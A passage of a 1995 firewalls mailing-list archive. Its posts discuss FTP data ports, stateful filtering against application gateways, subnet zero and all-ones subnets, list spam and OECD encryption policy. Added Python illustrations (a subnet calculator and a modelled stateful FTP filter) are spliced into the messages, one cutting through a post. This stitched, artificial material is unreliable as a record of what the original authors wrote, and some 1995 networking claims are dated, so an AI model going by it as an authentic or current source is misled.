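        if sub.broadcast_address == net.broadcast_address:
            flags.append("all-ones: its broadcast is also the all-subnets broadcast")
        result.append((str(sub), sub.num_addresses - 2, flags))
    return result


def usable_subnets(classful_network, new_prefix):
    """The subnets left once subnet zero and all-ones are excluded."""
    return [s for s, _, flags in subnets_with_flags(classful_network, new_prefix) if not flags]


def meanings(address, classful_network, new_prefix):
    """Everything `address` could denote if the mask is not known (as with a RIP or
    IGRP update): the whole network, a subnet, or a broadcast for either.
    More than one entry means a classful router has no way to decide."""
    net = ip_network(classful_network)
    addr = ip_address(address)
    found = []
    if addr == net.network_address:
        found.append(f"the whole network {net}")
    if addr == net.broadcast_address:
        found.append(f"broadcast to all of {net}")
    for sub in net.subnets(new_prefix=new_prefix):
        if addr == sub.network_address:
            found.append(f"subnet {sub}")
        if addr == sub.broadcast_address:
            found.append(f"broadcast for subnet {sub}")
    return found


if __name__ == "__main__":
    for sub, hosts, flags in subnets_with_flags("198.9.200.0/24", 26):
        print(sub, hosts, "hosts", "; ".join(flags))
    print(meanings("172.31.0.0", "172.31.0.0/16", 24))
    print(meanings("172.31.255.255", "172.31.0.0/16", 24))
```

Splitting a class C two ways (a /25) leaves nothing usable under the classful rule, since the one subnet is subnet zero and the other is all-ones; four ways (a /26) leaves two of the four. A classless protocol that carries the mask makes `meanings` a one-element answer, which is the "it depends" in Paul's reply.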
c i s c o S y s t e m s From firewalls-owner Fri Oct 13 06:14:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02419 for firewalls-outgoing; Fri, 13 Oct 1995 06:11:00 -0700 Received: from politics.ma02.bull.com (politics.ma02.bull.com [128.35.35.61]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02412 for ; Fri, 13 Oct 1995 06:10:57 -0700 Message-Id: <199510131310.GAA02412@miles.greatcircle.com> Received: by politics.ma02.bull.com (15.11/15.6) id AA24637; Fri, 13 Oct 95 09:04:40 edt From: John Young Subject: Re: NT FTP weirdness To: firewalls@greatcircle.com Date: Fri, 13 Oct 95 9:04:38 EDT In-Reply-To: ; from "Robert Dana" at Oct 12, 95 9:41 am Mailer: Elm [revision: 64.9] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From what I have seen in my traffic logs, the port selection from ftp.microsoft.com is not random. It appears that it is always selecting tcp port 5375 for the source of the data connection. This may or may not be relevant to my next question: Does anyone know how Firewall-1 handles this wrt its stateful packet filtering? Is Firewall-1 able to determine that this is a data connection that is related to an existing control connection or will the transfer simply fail without a global "allow all tcp from 5375 to any > 1023"? If this is the case, what would Firewall-1 really provide in the way of increased security over a Cisco with ACLs? I would be very interested in any insight as we are seriously considering Firewall-1 as an upgrade to our firewall architecture. > FTP.microsoft.com initiates all data port connections from random, > high-numbered TCP ports, instead of the RFC-mandated port 20. This > apparently > was intentional- there's a registry setting called "EnablePortAttack" that, > when turned on, will cause the server to initiate connections from 20 > again. TIA, John B. 
Young Network Engineer International Bull Telecommunications j.o.young@bull.com From firewalls-owner Fri Oct 13 06:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02482 for firewalls-outgoing; Fri, 13 Oct 1995 06:18:02 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA02475 for ; Fri, 13 Oct 1995 06:17:59 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa13251; 13 Oct 95 9:13 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma004626; Fri, 13 Oct 95 08:55:54 -0400 Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA03024; Fri, 13 Oct 95 09:12:51 EDT Message-Id: <9510131312.AA03024@tis.com> X-Sender: avolio@sol.tis.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 09:12:54 -0400 To: firewalls@greatcircle.com From: Frederick M Avolio Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>Application gateways are more secure. > >This statement is perhaps too strong. Indeed, I am being dogmatic, in my loveable way. :-) It is not a religious question, as someone suggested, but it *is* a philosophical one. See papers on our web server and on our competitors' web servers for philosophical discussions (well, as well as marketing stuff, etc. :-)). 
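John Young's question above (can a stateful filter relate ftp.microsoft.com's port-5375 data connection to the control connection, or does it need a blanket "allow from 5375 to any port above 1023"?) and the packet-filter-versus-gateway argument it sits next to, illustrated with an added example. This is not Firewall-1's implementation or any vendor's code; the hosts and the FTP exchange are constructed for the illustration, and it handles only active-mode (PORT) transfers without timeouts, so it is a model, not a product.

```python
"""Relating an FTP data connection to its control connection in a stateful filter.

Added illustration, written for this archive; it is not Firewall-1's code or
any vendor's. The hosts and the FTP exchange are constructed: 192.0.2.10 is
an inside client, 203.0.113.80 an outside FTP server that, like the
ftp.microsoft.com John describes, opens data connections from a high port
rather than port 20.
"""
import re
from dataclasses import dataclass, field

PORT_RE = re.compile(r"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$")


def parse_port_command(line):
    """Return (ip, port) from an FTP PORT command, or None for anything else."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        return None
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


@dataclass(frozen=True)
class Conn:
    src: str
    sport: int
    dst: str
    dport: int


def static_rule(conn):
    """The stateless ACL John quotes: allow TCP from source port 20 to any port
    above 1023. It fails for a server using port 5375, and it lets any host
    that chooses source port 20 reach every high port inside."""
    return "permit" if conn.sport == 20 and conn.dport > 1023 else "drop"


@dataclass
class StatefulFilter:
    inside: set                                   # inside client addresses
    control: set = field(default_factory=set)     # open FTP control connections
    pinholes: set = field(default_factory=set)    # expected data connections, used once

    def control_opened(self, client, cport, server):
        """An inside client connected to server:21 and the filter permitted it."""
        if client not in self.inside:
            return False
        self.control.add((client, cport, server))
        return True

    def control_line(self, client, cport, server, line):
        """Inspect one line the client sent on the control channel. A valid PORT
        command opens a pinhole for exactly one connection from the server to the
        advertised client port, whatever source port the server picks."""
        parsed = parse_port_command(line)
        if parsed is None or (client, cport, server) not in self.control:
            return False
        addr, port = parsed
        # A PORT naming any address but the client's own, or a privileged port,
        # would turn the control channel into a way of reaching other hosts.
        if addr != client or port < 1024:
            return False
        self.pinholes.add((server, client, port))
        return True

    def inbound_syn(self, conn):
        """Decide an inbound connection-opening segment."""
        key = (conn.src, conn.dst, conn.dport)
        if key in self.pinholes:
            self.pinholes.discard(key)     # one data connection per PORT command
            return "permit"
        return "drop"


def demo():
    """Constructed session; returns the verdicts of both approaches side by side."""
    fw = StatefulFilter(inside={"192.0.2.10"})
    fw.control_opened("192.0.2.10", 1234, "203.0.113.80")
    fw.control_line("192.0.2.10", 1234, "203.0.113.80", "PORT 192,0,2,10,4,1\r\n")  # port 1025
    data = Conn("203.0.113.80", 5375, "192.0.2.10", 1025)        # server picks port 5375
    probe = Conn("198.51.100.9", 20, "192.0.2.10", 1025)         # stranger using sport 20
    return {
        "data from port 5375, static": static_rule(data),
        "data from port 5375, stateful": fw.inbound_syn(data),
        "same data connection replayed, stateful": fw.inbound_syn(data),
        "stranger from port 20, static": static_rule(probe),
        "stranger from port 20, stateful": fw.inbound_syn(probe),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{v:6} {k}")
```

The pinhole is keyed on the server address, the client address and the port the client advertised, and not on the server's source port, so the 5375 case works without any global rule; the same key also stops a third host from riding in on source port 20, which the static ACL cannot. The price is the one the application-gateway camp keeps pointing out: to do this the filter has to read and parse the FTP control channel, which is application-level work whatever the product is called.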
Fred From firewalls-owner Fri Oct 13 06:44:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA02603 for firewalls-outgoing; Fri, 13 Oct 1995 06:25:04 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA02596 for ; Fri, 13 Oct 1995 06:25:01 -0700 From: dgooding@accel.com Received: from smtpgwy.accel.com by relay3.UU.NET with SMTP id QQzlgv25043; Fri, 13 Oct 1995 09:23:10 -0400 Received: from ccMail by smtpgwy.accel.com id AA813601172 Fri, 13 Oct 95 09:19:32 EST Date: Fri, 13 Oct 95 09:19:32 EST Message-Id: <9509138136.AA813601172@smtpgwy.accel.com> To: firewalls@greatcircle.com Subject: Who would you invest in? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Uh-oh, here comes a venture capitalist, there goes the neighborhood] If you could invest in a firewall company (not your own), who would it be? Related to that, after reading the mail list archives and the FAQ, I'm beginning to believe the firewall market will be two-tiered: high end, Fortune 1000 enterprise firewalls and "low end," unfortunate 100,000 firewalls. The enterprise variety will compete based on "the best" security, scalability, manageability, performance, and compatibility with overall enterprise network security. The small business firewall market will have "good enough" security, attractive pricing, and features appropriate for two- or three-tier distribution. Do you agree? And if so, who are the leaders in the enterprise firewall market, and in the small- to medium-size business firewall market? Or, as someone has suggested, will the current leaders be swallowed into ISP functionality (for the enterprise? for the mass market?)? 
Don Gooding Research Partner Accel Partners dgooding@accel.com http://www.accel.com From firewalls-owner Fri Oct 13 08:01:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04164 for firewalls-outgoing; Fri, 13 Oct 1995 07:43:19 -0700 Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04146 for ; Fri, 13 Oct 1995 07:43:11 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id KAA07603; Fri, 13 Oct 1995 10:40:43 -0400 Date: Fri, 13 Oct 1995 10:40:43 -0400 Message-Id: <199510131440.KAA07603@psyche.the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Michael Haberler From: Anton J Aylward Subject: Re: WE THE PEOPLE "....want the facts to make informed intel Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:39 11/10/95 -0100, Michael Haberler wrote: >What about mailing list/news software which only would accept PGP-signed >messages where the keys must have a certificate path length of at least 2 in >the mailinglist web of trust (i.e. a contributor must be endorsed by at >least two other)? ..... > >Michael Haberler mah@eunet.co.at >EUnet Austria Ltd MH182 >A-1090 Vienna, Austria, Thurngasse 8/16 >Tel: +43 (1) 31376 fax: +43 (1) 3106926 I know this gets away from the charter of the groups, but I believe we have to defend that same charter. One of the reasons I use lists rather than USENET is the s/n ratio. To date, I find that this list has a pretty good ratio. I believe this is because it is a critical technology subject and the subscribers and the people who submit are professionals to whom this list relates to their livelihood. 
Once it becomes a USENET group we open it up to all comers, more specifically, those who have no professional interest in the technical quality of the postings. I guess spamming is a prime example of no technical quality. I like the web of trust idea, but there are simpler ways. The most obvious one is to only accept postings from subscribers. Correct me if I'm wrong, but I recall reading that some lists do actually practice this. Of course once the list is cross-linked with a newsgroup that all goes out the window. To be honest, I've never believed in the "meek shall inherit..." and "ignore them and they'll go away" attitudes towards bullies and loudmouths and spammers. On top of this all, I am outraged as a Canadian Citizen that someone should try and force this on me AND justify it by an interpretation of HIS constitution which is, at best, flakey. This list is very strongly international in content. Part of our view of freedom - and I understand the one to be held in the USA - is that you can't force your beliefs, religious, political or otherwise, on those who do not wish to subscribe to them. It is sad that people who I've always believed a firewall is primarily about access control. The 'web of trust' that Michael espouses could be viewed this way. Lists are not meant to be "Democratic" - whatever that means. A list "manager" has every right to delete someone who abuses the aims and charter. Having a front-end filter which only allows posting by subscribers is one way to do this. Without needing all the PGP technology. Now I've raised this in the forum of the list, I'd like to move all discussion out of the list, as I did with my original communication about this to Brent. He manages the list, it is to him that we should direct discussion about what we think he ought to do about occurrences like this. Sigh! 
Dealing with management and preaching at them to be proactive about security seems to have a distinct effect on the way I'm dealing with things; political solutions before technical solutions. Either that or I'm growing old faster than I thought. /anton -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Fri Oct 13 08:15:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04484 for firewalls-outgoing; Fri, 13 Oct 1995 07:58:55 -0700 Received: from intex.intex.net (intex.intex.net [204.255.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA04476 for ; Fri, 13 Oct 1995 07:58:51 -0700 Received: from dialupb56.intex.net (dialupb56.intex.net [204.255.103.56]) by intex.intex.net (8.6.12/4.1.4) with SMTP id JAA10825; Fri, 13 Oct 1995 09:56:55 -0500 Message-Id: <199510131456.JAA10825@intex.intex.net> X-Sender: lpierce@intex.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 13 Oct 1995 09:56:46 -0500 To: Frederick M Avolio , firewalls@GreatCircle.COM From: lpierce@intex.net (S. Lane Pierce) Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:12 AM 10/13/95 -0400, Frederick M Avolio wrote: >>>Application gateways are more secure. >> >>This statement is perhaps too strong. > >Indeed, I am being dogmatic, in my loveable way. :-) bla bla bla yada yada.... Fellow firewallers (and vendors). An outright plug (like the one generating this thread) is best done by emailing directly to the originator, not the list. Now a healthy discussion on the benefits of application gateways vs. packet filters sounds like fun, but this one started with a "my daddy can beat up your daddy" marketing strategy, not in the pursuit of knowledge. S. 
Lane Pierce lpierce@intex.net From firewalls-owner Fri Oct 13 08:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA04853 for firewalls-outgoing; Fri, 13 Oct 1995 08:18:25 -0700 Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA04846 for ; Fri, 13 Oct 1995 08:18:19 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA06334; Fri, 13 Oct 95 11:18:14 EDT Date: Fri, 13 Oct 1995 11:18:13 -0400 (EDT) From: Scott Barman To: padgett@tccslr.dnet.mmc.com Cc: firewalls@greatcircle.com Subject: Re: Various FTPs In-Reply-To: <9510130120.AA18104@uvs1.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote: > I agree with Marcus concerning the problems in FTP & possibly IPV6 > will repair/replace it. For now I suspect that the answer is a I have been "observing" the output of the IETF for IPv6 and have seen nothing regarding changing ftp. It seems their concerns are a larger address space and security. I don't think I'm alone in my desire to see something replace it and, as Marcus Ranum said about himself in a previous note, I'm not "big" enough to try to force a change! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "I don't know if security explains why the Win95 support Web servers run BSDI 2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is the ideal Web software solution. Does Redmond know something we don't know?" -Robert X. 
Cringely, INFOWORLD, 9/11/95 From firewalls-owner Fri Oct 13 08:44:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05007 for firewalls-outgoing; Fri, 13 Oct 1995 08:33:45 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05000 for ; Fri, 13 Oct 1995 08:33:41 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id KAA16107; Fri, 13 Oct 1995 10:33:12 -0500 Date: Fri, 13 Oct 1995 10:33:10 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Howard Berkowitz cc: Yannick Gravel , firewalls@GreatCircle.COM Subject: Re: First and last subnet ??? In-Reply-To: <199510121505.LAA00133@clark.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If a network is subnetted, what are routers *supposed* to do with broadcasts to the "whole" network? Where might confusion arise between the network address and its all-zeros subnet?---Routing info? Forgive me if these are particularly dumb questions--I've been up most of the night, and my power light is flickering rather dimly. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 [snip] >A pair of simple examples: > > 172.31.0.0 > 172.31.0.0 > > One is subnet zero of network 172.31.0.0, the other is the whole > network. Which is which? > > 172.31.255.255 > 172.31.255.255 > > One is the broadcast for the whole network; the other is the > broadcast for subnet 255. Again, which is which? 
> [snip] > > Howard > From firewalls-owner Fri Oct 13 08:45:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05022 for firewalls-outgoing; Fri, 13 Oct 1995 08:34:17 -0700 Received: from rds.com (wpgate.rds.com [206.54.49.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA05015 for ; Fri, 13 Oct 1995 08:34:11 -0700 Received: from RDS-Message_Server by rds.com with Novell_GroupWise; Fri, 13 Oct 1995 08:28:35 -0700 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Fri, 13 Oct 1995 08:34:21 -0700 From: Doug Kaye To: firewalls@GreatCircle.COM Subject: Re: Firewall1 Comparison -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm seeing a lot of discussion on packet filters vs. application gateways. Does it make sense to implement both? Is it too expensive or overkill? If you implement both, where does the filter go -- on the public side of the application gateway? Is it possible to run both on the same hardware? ============================================================ Doug Kaye Rational Data Systems, Novato, CA Tel:415-382-8400 FAX:415-382-8441 http://www.rds.com From firewalls-owner Fri Oct 13 08:46:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05031 for firewalls-outgoing; Fri, 13 Oct 1995 08:35:08 -0700 Received: from gateway.ppg.com (gateway.ppg.com [199.221.65.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA05024 for ; Fri, 13 Oct 1995 08:35:03 -0700 Received: by gateway.ppg.com id AA08563 (SMTP Gateway for firewalls@GreatCircle.COM); Fri, 13 Oct 1995 11:32:56 -0400 Message-Id: <199510131532.AA08563@gateway.ppg.com> Received: by gateway.ppg.com (Protected-side Proxy Mail Agent-1); Fri, 13 Oct 1995 11:32:56 -0400 From: "Sacherich, Larry" To: "'Firewalls-Digest-L'" Cc: "'Walt Herrmann'" Subject: Re: Firewall1 Comparison Date: Fri, 13 Oct 95 11:25:00 PDT Encoding: 19 TEXT X-Mailer: Microsoft Mail V3.0 Sender: 
firewalls-owner@GreatCircle.COM Precedence: bulk Walt, Every security book or white paper that I have read indicates that an application level gateway is the best form of security. It goes a step beyond just packet filtering. You would be well advised to at least talk to firewall vendors like ANS, TIS, and BorderWare.

ANS           800-456-8267   info@ans.net        http://www.ans.net/
TIS           301-854-6889   avolio@tis.com      http://www.tis.com/
Net-Partners  800-723-1166   sales@netpart.com   http://www.netpart.com

Larry Sacherich sacherich@ppg.com Comments are my personal opinion, and not that of PPG Industries. From firewalls-owner Fri Oct 13 08:47:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA05071 for firewalls-outgoing; Fri, 13 Oct 1995 08:40:08 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA05064 for ; Fri, 13 Oct 1995 08:40:05 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id KAA25609; Fri, 13 Oct 1995 10:38:12 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id KAA17838; Fri, 13 Oct 1995 10:38:32 -0500 From: Alan Hannan Message-Id: <199510131538.KAA17838@gaijin.mid.net> Subject: Re: Firewall1 Comparison To: avolio@TIS.COM (Frederick M Avolio) Date: Fri, 13 Oct 1995 10:38:32 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510131312.AA03024@tis.com> from "Frederick M Avolio" at Oct 13, 95 09:12:54 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1085 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Frederick M Avolio is rumored to have said: ] ] >>Application gateways are more secure. ] > ] >This statement is perhaps too strong. ] ] Indeed, I am being dogmatic, in my loveable way. :-) Indeed, though we may argue on adverbs. 
IMHO saying Application Gateways are more secure is a very true statement. How about this one? "Adding more services makes one more likely to have security problems", or "A policy of 'that which is not allowed is denied' is more secure than a policy of 'that which is not disallowed is allowed'." While I can find a secure firewall that has more services than an insecure one, in _general_ the rule is true. Likewise, a firewall with 'not allowed, denied' is not necessarily more secure than a firewall with 'not denied, allowed'. My point: dealing with the packet in and of itself, as opposed to based upon the mac/tcp/ip/udp headers, is significantly more secure, generally speaking. -- Alan Hannan http://www.mid.net/~alan 402/472-0239 Network Systems/Security Administrator MIDnet, Inc. From firewalls-owner Fri Oct 13 08:48:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA04498 for firewalls-outgoing; Fri, 13 Oct 1995 07:59:36 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA04491 for ; Fri, 13 Oct 1995 07:59:32 -0700 Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA06978 ; Fri, 13 Oct 95 10:57:26 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Fri, 13 Oct 95 10:53 EDT Message-Id: Subject: Re: firewalls for WIN95 To: savron@world-net.sct.fr Date: Fri, 13 Oct 1995 10:52:55 -0400 (EDT) From: "Michael H. Warfield" Cc: firewalls@greatcircle.com In-Reply-To: <199510130836.JAA17359@world-net.sct.fr> from "savron@world-net.sct.fr" at Oct 13, 95 09:36:09 am X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 579 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This was just toooooo tempting.... 
savron@world-net.sct.fr enscribed thusly: > > is there any firewalling solution for a WIN95 pc ? Dunno. Still trying to get the virus detectors to spot Windows 95. Getting a firewall to exclude it may be a little tougher. :-) :-) > Thanks Mike -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Fri Oct 13 09:22:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05592 for firewalls-outgoing; Fri, 13 Oct 1995 09:07:40 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA05585 for ; Fri, 13 Oct 1995 09:07:36 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Fri, 13 Oct 1995 17:05:34 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <307E9416@smtpgty.saicuk.co.uk>; Fri, 13 Oct 95 16:30:14 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Encryption Date: Fri, 13 Oct 95 13:29:00 GMT Message-ID: <307E9416@smtpgty.saicuk.co.uk> Encoding: 15 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Two OECD groups have been working towards a position paper on rules and standards for encryption across national boundaries. The current position is that they expect to release the paper to member governments in December, subject to completion of review of a US government proposal. The next stage will be to release the paper to governments and industry. This is expected to be in April/May 1996. The timetable may be subject to change and it is possible that a second government-only circulation will take place before the government/industry stage. 
Some member governments have said that they will move rapidly to enact legislation and may accept the recommendations as quasi-law as early as January 1996. That could mean that some national rules are changed before a consultation period with industry. The appropriate sections of each member government may be prepared to discuss the situation but will be highly resistant to a confrontational approach. Ian J-B From firewalls-owner Fri Oct 13 09:31:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05542 for firewalls-outgoing; Fri, 13 Oct 1995 09:02:46 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA05535 for ; Fri, 13 Oct 1995 09:02:41 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id MAA25836; Fri, 13 Oct 1995 12:00:21 -0400 From: Howard Berkowitz Message-Id: <199510131600.MAA25836@clark.net> Subject: Re: First and last subnet ??? To: fsenter@mail.state.mo.us (Frank K. Senter) Date: Fri, 13 Oct 1995 12:00:17 -0400 (EDT) Cc: hcb@CLARK.NET, yg@muturl.planet-int.net, firewalls@GreatCircle.COM In-Reply-To: from "Frank K. Senter" at Oct 13, 95 10:33:10 am X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 2188 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > If a network is subnetted, what are routers *supposed* to do with > broadcasts to the "whole" network? Where might confusion arise between > the network address and its all-zeros subnet?---Routing info? Answering a bit indirectly, broadcasts to the whole network number -- if it is subnetted -- are at best discouraged. It's much better to send directed broadcasts to specific subnets. Yes, routing updates are a potential source of confusion. 
If there is no mask information, the router can't tell whether something is destined for the whole network -- a potential error if the network is subnetted -- or for subnet zero. > > Forgive me if these are particularly dumb questions--I've been up most of > the night, and my power light is flickering rather dimly. I'm hand-waving a bit, because subnet zero/all-one work sometimes... it is dependent on both the routing protocols and the implementations The subnet zero/all-one restrictions tend to go away when dealing with classless routing. Again, there can be compatibility problems. Two general points: 1. The idea of a network number is at best obsolescent in a CIDR world. The idea of a prefix is much closer. 2. Yes, you can get away sometimes with subnet zero and subnet all-ones. I avoid them because experience has shown often enough that they lead to incompatibilities. Given the range of methods available for gaining address space/subnetting, I can't think of a time I was ever forced to use the illegal subnet numbers. This is getting somewhat far afield of firewalls, I'm afraid. > > > Frank Senter > Senior Information Specialist > Missouri Highway and Transportation Department > P.O. Box 270 > Jefferson City MO 65102 > [snip] > >A pair of simple examples: > > > > 172.31.0.0 > > 172.31.0.0 > > > > One is subnet zero of network 172.31.0.0, the other is the whole > > network. Which is which? > > > > 172.31.255.255 > > 172.31.255.255 > > > > One is the broadcast for the whole network; the other is the > > broadcast for subnet 255. Again, which is which? 
> > > [snip] > > > > Howard > > > From firewalls-owner Fri Oct 13 10:05:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA06375 for firewalls-outgoing; Fri, 13 Oct 1995 09:48:32 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA06367 for ; Fri, 13 Oct 1995 09:48:20 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id JAA23794; Fri, 13 Oct 1995 09:45:35 -0700 Date: Fri, 13 Oct 1995 09:45:35 -0700 Message-Id: <199510131645.JAA23794@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma023787; Fri Oct 13 09:44:38 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Howard Berkowitz , yg@muturl.planet-int.net (Yannick Gravel) From: Andrew Foss Subject: Re: First and last subnet ??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is kind of a stickler. Let's say you want to subnet a Class C 198.9.200.0 w/ 1 bit of netmask to make 2 126 (128 less 2) node networks; it's not allowed (as per the RFC and many people's IP stacks)! The minimum subnet you can make is 2 bits, which will make 2 (NOT 4) networks of 62 numbers. e.g. 198.9.200.0 w/ a netmask 255.255.255.192 (2-bit netmask) yields Network 1 198.9.200.0-198.9.200.63 - Which becomes unusable since you cannot refer to it, since 198.9.200.0 is reserved (though rarely used) as a means to broadcast to all the subnets (if you broadcast 0's)! Network 2 198.9.200.64-198.9.200.127 - Is a usable subnet 198.9.200.64 Network 3 198.9.200.128-198.9.200.191 - Is a usable subnet 198.9.200.128 Network 4 198.9.200.192-198.9.200.255 - Unusable, same as Network 1, if you broadcast 1's. 
It's too bad, since very few people require the broadcast-to-all-the-subnets capability, and it makes subnetting Class C's ridiculously inefficient. Many, many people do it though, and I've run into a few that have been bitten. Most newer systems seem to function fine, but I've run into a few vestigial machines that can't live on the broadcast networks (for lack of a better name).

At 08:05 AM 10/12/95 -0700, Howard Berkowitz wrote:
>>
>> Hi Net&Sys Security people,
>>
>> Something that everybody is talking about, but not everybody
>> is saying the same thing about subnetting:
>>
>> Yes, everybody agrees that we lose the first and last host of
>> each subnet for net.iding and broadcasting.
>>
>> But, some are saying that I can use all subnets; but others are
>> saying that we lose the first and last subnet...
>>
>> Whose truth is true..
>>
>> Thanks..
>>
